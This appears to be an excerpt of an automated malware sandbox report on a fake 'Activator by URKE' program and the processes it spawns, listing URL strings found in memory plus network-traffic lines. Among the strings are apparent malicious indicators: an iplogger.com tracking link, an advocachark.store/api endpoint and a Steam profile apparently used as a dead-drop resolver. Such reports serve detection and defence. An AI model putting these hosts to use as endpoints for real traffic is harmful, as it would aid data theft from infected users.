    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://advocachark.store/
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://advocachark.store/R
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://advocachark.store/api
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://advocachark.store/api9
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://advocachark.store:443/apipp
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstaticHJ
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/avatars/
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/banners/
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/channel-icons/
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/guilds/
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/icons/
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/role-icons/
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/splashes/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311833128.0000000002B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzol
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwP
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=engl
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=english
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&amp;l=e
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english
    Source: BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: n3.exeString found in binary or memory: https://datalake.azure.net/https://api.loganalytics.iohttps://graph.microsoft.us/https://api.loganal
    Source: n3.exeString found in binary or memory: https://discord.com/MESSAGE_REACTION_ADDTHREAD_MEMBER_UPDATEunmarshall
    Source: n3.exe, 00000002.00000002.2285591123.000000000282A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9//sticker-packs
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9//voice/
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9//voice/regions
    Source: n3.exe, 00000002.00000002.2285591123.000000000282A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/09Az~~go_sched_gomaxprocs_threadsgo_memstats_alloc_bytes_totalgo_memstats
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/applications
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/channels/
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/gateway
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/gateway/bot
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/guilds
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/guilds/
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/guilds/https://discord.com/api/v9/channels/https://discord.com/api/v9/use
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/oauth2/
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/oauth2/applications
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/stage-instances
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/stickers/
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/webhooks/
    Source: n3.exeString found in binary or memory: https://github.com/golang/protobuf/issues/1609):
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: Activator by URKE v2.5.exe, 00000000.00000003.2297946552.00000267D7F98000.00000004.00000020.00020000.00000000.sdmp, uros.url.0.drString found in binary or memory: https://iplogger.com/1KhnJ4
    Source: Activator by URKE v2.5.exe, 00000000.00000003.2314678126.00000267D7F98000.00000004.00000020.00020000.00000000.sdmp, Activator by URKE v2.5.exe, 00000000.00000003.2315704743.00000267D7F98000.00000004.00000020.00020000.00000000.sdmp, Activator by URKE v2.5.exe, 00000000.00000002.2317043498.00000267D7F98000.00000004.00000020.00020000.00000000.sdmp, Activator by URKE v2.5.exe, 00000000.00000003.2297946552.00000267D7F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.com/1KhnJ4&
    Source: Activator by URKE v2.5.exe, 00000000.00000003.2300449931.00000267D8021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.com/1KhnJ4(
    Source: Activator by URKE v2.5.exe, 00000000.00000003.2314678126.00000267D7F98000.00000004.00000020.00020000.00000000.sdmp, Activator by URKE v2.5.exe, 00000000.00000003.2315704743.00000267D7F98000.00000004.00000020.00020000.00000000.sdmp, Activator by URKE v2.5.exe, 00000000.00000002.2317043498.00000267D7F98000.00000004.00000020.00020000.00000000.sdmp, Activator by URKE v2.5.exe, 00000000.00000003.2297946552.00000267D7F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.com/1KhnJ4.
    Source: Activator by URKE v2.5.exe, 00000000.00000003.2300449931.00000267D8021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.com/1KhnJ4rr
    Source: dxcompiler.dllString found in binary or memory: https://llvm.org/svn/llvm-project/cfe/tags/RELEASE_370/final/lib/Basic/Version.cpp
    Source: n3.exeString found in binary or memory: https://login.microsoftonline.com/https://gallery.usgovcloudapi.net/mariadb.database.usgovcloudapi.n
    Source: n3.exeString found in binary or memory: https://manage.windowsazure.com/https://vault.usgovcloudapi.net/mysql.database.usgovcloudapi.nethttp
    Source: n3.exeString found in binary or memory: https://management.core.windows.net/https://management.chinacloudapi.cn/https://servicebus.chinaclou
    Source: n3.exeString found in binary or memory: https://management.usgovcloudapi.net/https://servicebus.usgovcloudapi.net/https://batch.core.usgovcl
    Source: n3.exeString found in binary or memory: https://servicebus.windows.net/https://batch.core.windows.net/https://manage.windowsazure.us/https:/
    Source: n3.exe, 00000002.00000002.2285591123.00000000027DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://status.discord.com/api/v2/scheduled-maintenances/
    Source: n3.exe, 00000002.00000002.2285591123.0000000002664000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://status.discord.com/api/v2/scheduled-maintenances/active.json
    Source: n3.exe, 00000002.00000002.2285591123.0000000002664000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://status.discord.com/api/v2/scheduled-maintenances/active.jsonhttps://status.discord.com/api/v
    Source: n3.exe, 00000002.00000002.2285591123.0000000002664000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://status.discord.com/api/v2/scheduled-maintenances/upcoming.json
    Source: BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311833128.0000000002B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: BitLockerToGo.exe, 00000003.00000002.2311503934.0000000002A7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765
    Source: BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AAD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311833128.0000000002B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AAD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900:kA
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311833128.0000000002B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: n3.exeString found in binary or memory: https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comtoken
    Source: n3.exeString found in binary or memory: https://vault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttps://vault.azure.cn/vault.mi
    Source: DragExt64.dllString found in binary or memory: https://winscp.net/D
    Source: DragExt64.dllString found in binary or memory: https://winscp.net/eng/docs/dragext
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
